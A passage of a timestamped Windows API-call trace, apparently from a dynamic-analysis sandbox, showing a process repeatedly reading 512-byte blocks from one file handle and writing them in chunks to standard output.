lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] GetFileType (hFile=0x4c) returned 0x1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.129] GetFileType (hFile=0x4c) returned 0x1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.129] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.129] GetFileType (hFile=0x4c) returned 0x1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.129] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.129] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.129] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.129] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.129] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.129] GetFileType (hFile=0x4c) returned 0x1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.129] GetFileType (hFile=0x4c) returned 0x1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.129] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.129] GetFileType (hFile=0x4c) returned 0x1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.129] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.129] GetFileType (hFile=0x4c) returned 0x1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.130] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.130] GetFileType (hFile=0x4c) returned 0x1 [0174.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.130] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.130] GetFileType (hFile=0x4c) returned 0x1 [0174.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.130] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.130] GetFileType (hFile=0x4c) returned 0x1 [0174.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.130] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.130] GetFileType (hFile=0x4c) returned 0x1 [0174.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.130] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.130] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.130] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] GetFileType (hFile=0x4c) returned 0x1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] GetFileType (hFile=0x4c) returned 0x1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] GetFileType (hFile=0x4c) returned 0x1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] GetFileType (hFile=0x4c) returned 0x1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] GetFileType (hFile=0x4c) returned 0x1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] GetFileType (hFile=0x4c) returned 0x1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] GetFileType (hFile=0x4c) returned 0x1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] GetFileType (hFile=0x4c) returned 0x1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.154] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.154] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.154] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.154] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] GetFileType (hFile=0x4c) returned 0x1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] GetFileType (hFile=0x4c) returned 0x1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] GetFileType (hFile=0x4c) returned 0x1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] GetFileType (hFile=0x4c) returned 0x1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] GetFileType (hFile=0x4c) returned 0x1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] GetFileType (hFile=0x4c) returned 0x1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] GetFileType (hFile=0x4c) returned 0x1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] GetFileType (hFile=0x4c) returned 0x1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.155] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.155] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.155] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.155] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] GetFileType (hFile=0x4c) returned 0x1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] GetFileType (hFile=0x4c) returned 0x1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] GetFileType (hFile=0x4c) returned 0x1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] GetFileType (hFile=0x4c) returned 0x1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] GetFileType (hFile=0x4c) returned 0x1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] GetFileType (hFile=0x4c) returned 0x1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] GetFileType (hFile=0x4c) returned 0x1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] GetFileType (hFile=0x4c) returned 0x1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.156] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.156] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.156] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.156] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] GetFileType (hFile=0x4c) returned 0x1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] GetFileType (hFile=0x4c) returned 0x1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] GetFileType (hFile=0x4c) returned 0x1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] GetFileType (hFile=0x4c) returned 0x1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] GetFileType (hFile=0x4c) returned 0x1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] GetFileType (hFile=0x4c) returned 0x1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] GetFileType (hFile=0x4c) returned 0x1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] GetFileType (hFile=0x4c) returned 0x1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.157] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.157] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] GetFileType (hFile=0x4c) returned 0x1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] GetFileType (hFile=0x4c) returned 0x1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] GetFileType (hFile=0x4c) returned 0x1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] GetFileType (hFile=0x4c) returned 0x1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] GetFileType (hFile=0x4c) returned 0x1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] GetFileType (hFile=0x4c) returned 0x1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] GetFileType (hFile=0x4c) returned 0x1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] GetFileType (hFile=0x4c) returned 0x1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.158] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.158] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.158] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.158] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] GetFileType (hFile=0x4c) returned 0x1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] GetFileType (hFile=0x4c) returned 0x1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] GetFileType (hFile=0x4c) returned 0x1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] GetFileType (hFile=0x4c) returned 0x1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] GetFileType (hFile=0x4c) returned 0x1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] GetFileType (hFile=0x4c) returned 0x1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] GetFileType (hFile=0x4c) returned 0x1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] GetFileType 